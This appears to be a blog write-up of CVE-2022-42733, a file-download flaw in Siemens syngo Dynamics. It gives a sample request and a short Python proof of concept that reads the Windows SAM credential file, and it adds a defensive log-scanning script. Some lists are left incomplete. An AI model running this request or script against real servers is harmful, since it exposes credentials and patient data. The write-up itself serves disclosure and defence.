CVE-2022-42733 is a security flaw found in all versions of syngo Dynamics before VA40G HF01. This vulnerability can allow attackers to read files from any location on the system that the web server’s application pool account can access. The problem comes from a web service feature which lacks proper restrictions on which files it will let users download—all it takes is knowing the service’s endpoint and making some crafted requests.

In this post, I’ll break down what the vulnerability is, how it works, and provide a demonstration code snippet. This is meant for educational and defensive purposes only: patch your systems if you haven’t!

- Siemens advisory: SSA-884388
- MITRE CVE entry
- NVD entry

Understanding the Problem

syngo Dynamics is widely used in healthcare for managing images and reporting—so it’s serious when a flaw affects patient privacy or system security. In this case, the application server hosts a web service with an operation that lets a user fetch files. The core problem is the lack of filters or controls on which files you can ask for: if you can guess the path, you can get the file, as long as the server’s application pool account can read it.

In simple terms:

Suppose the web service exposes an API call like this:

https://syngodynamics.example.com/filefetch?path=C:\Users\app\report.pdf

If you supply ANY path, the service goes ahead and lets you download the file—no check to see if you should be allowed to.

To exploit this vulnerability, an attacker needs:

- Network access to the syngo Dynamics web server (which could be internal, but healthcare networks have many users and sometimes weak segmentation)
- Knowledge (or guesses) about file paths on the Windows server

The attacker crafts a request to the relevant web service operation, specifying a file path—let’s say, for the Windows SAM file, or for sensitive syngo Dynamics configuration:

GET /FileReadService?path=C:\Windows\System32\config\SAM HTTP/1.1
Host: vuln-syngo-dynamics.local

If the web service runs with enough privileges, the attacker gets a copy of the requested file’s contents.

Exploit Example: Simple PoC in Python

Below is a proof-of-concept Python snippet showing how this would likely be exploited (exact endpoint and parameter may vary):

import requests

# Target server and file to read
base_url = 'https://syngodynamics.example.com'
endpoint = '/FileReadService'
file_path = r'C:\Windows\System32\config\SAM'  # Vulnerable: Read sensitive file

# Build the URL
url = f"{base_url}{endpoint}?path={file_path}"

# If authentication is required, include auth details here
response = requests.get(url, verify=False)

if response.status_code == 200:
    # Print out the contents (could be binary)
    print(f"[*] Successfully read {file_path}!")
    print(response.content)
else:
    print(f"[!] Failed to read file. Server responded with: {response.status_code}")

> *NOTE: This script is a demonstration only. Never use it against computers you do not own or have permission to test.*

- Other users’ private data on the system

If the website runs under a high-privilege account (like a local administrator), the risk is extreme. But even low-privilege accounts can often access sensitive application data or configurations.

Mitigation and Recommendations

Siemens provides a patch in syngo Dynamics VA40G HF01. If you’re running an older version:

Key Takeaways

- CVE-2022-42733 allows attackers to download arbitrary files from vulnerable syngo Dynamics installations
- Patching is critical, especially in healthcare environments handling sensitive data

If you are running syngo Dynamics, check your versions and update today. Control internal network access to your medical imaging servers, and review accounts and permissions for all web server application pools.
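Operators cannot change the vendor's code, so the practical complement to patching is reviewing web server logs for the request shape described above. The following is an added example, not code from the original post or from Siemens: it scans IIS W3C log lines for requests to the file-download operation whose path parameter is an absolute drive path, a UNC path, or a `..` traversal. The endpoint and parameter names are the post's hypothetical placeholders, and the log field order is an assumption to check against the `#Fields` header of your own logs.

```python
import re
from urllib.parse import parse_qs, unquote

# Hypothetical names from the post's placeholder request; substitute the real
# operation and parameter names seen in your own server logs.
ENDPOINT = "/filereadservice"
PARAM = "path"

# Path forms a legitimate client of a fixed-folder download should never send.
CHECKS = [("absolute-drive-path", re.compile(r"^[a-z]:[\\/]", re.I)),  # C:\...
          ("unc-path", re.compile(r"^[\\/]{2}")),                        # \\srv\share
          ("dot-dot-traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)"))]  # '..' segment

def decode_param(query):
    """Decoded path parameter ('' if absent). parse_qs decodes once; the
    extra unquote also catches double-encoded input such as %252e."""
    values = parse_qs(query, keep_blank_values=True).get(PARAM, [])
    return unquote(values[0]) if values else ""

def classify(path):
    """Reasons a requested path looks like an arbitrary file read attempt."""
    return [name for name, rx in CHECKS if rx.search(path)]

def flag_requests(log_lines):
    """Return (client_ip, status, path, reasons) for suspicious requests.
    Assumed W3C field order: date time s-ip cs-method cs-uri-stem
    cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status."""
    hits = []
    for line in log_lines:
        f = line.split()
        if line.startswith("#") or len(f) < 11 or f[4].lower() != ENDPOINT:
            continue
        path = decode_param(f[5])
        reasons = classify(path)
        if reasons:
            hits.append((f[8], int(f[10]), path, reasons))
    return hits

# Constructed sample lines (not real traffic): a normal download, an
# absolute-path read, and a double-encoded traversal the server rejected.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2022-11-17 17:15:00 10.0.0.5 GET /FileReadService path=reports%5Cstudy123.pdf 443 - 10.0.0.21 Mozilla/5.0 200",
    "2022-11-17 17:15:02 10.0.0.5 GET /FileReadService path=C%3A%5CProgramData%5Capp%5Csettings.xml 443 - 10.0.0.99 curl/7.79 200",
    "2022-11-17 17:15:03 10.0.0.5 GET /FileReadService path=..%252F..%252Fweb.config 443 - 10.0.0.99 curl/7.79 404",
]
```

A 200 status on a flagged request means the file was served and the host should be treated as compromised; a 4xx only shows that someone probed the endpoint.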

Further Reading

- Siemens Security Advisory – SSA-884388
- CVE-2022-42733 at NVD
- CWE-862: Missing Authorization — the class of bug involved

Timeline

Published on: 11/17/2022 17:15:00 UTC
Last modified on: 11/21/2022 19:57:00 UTC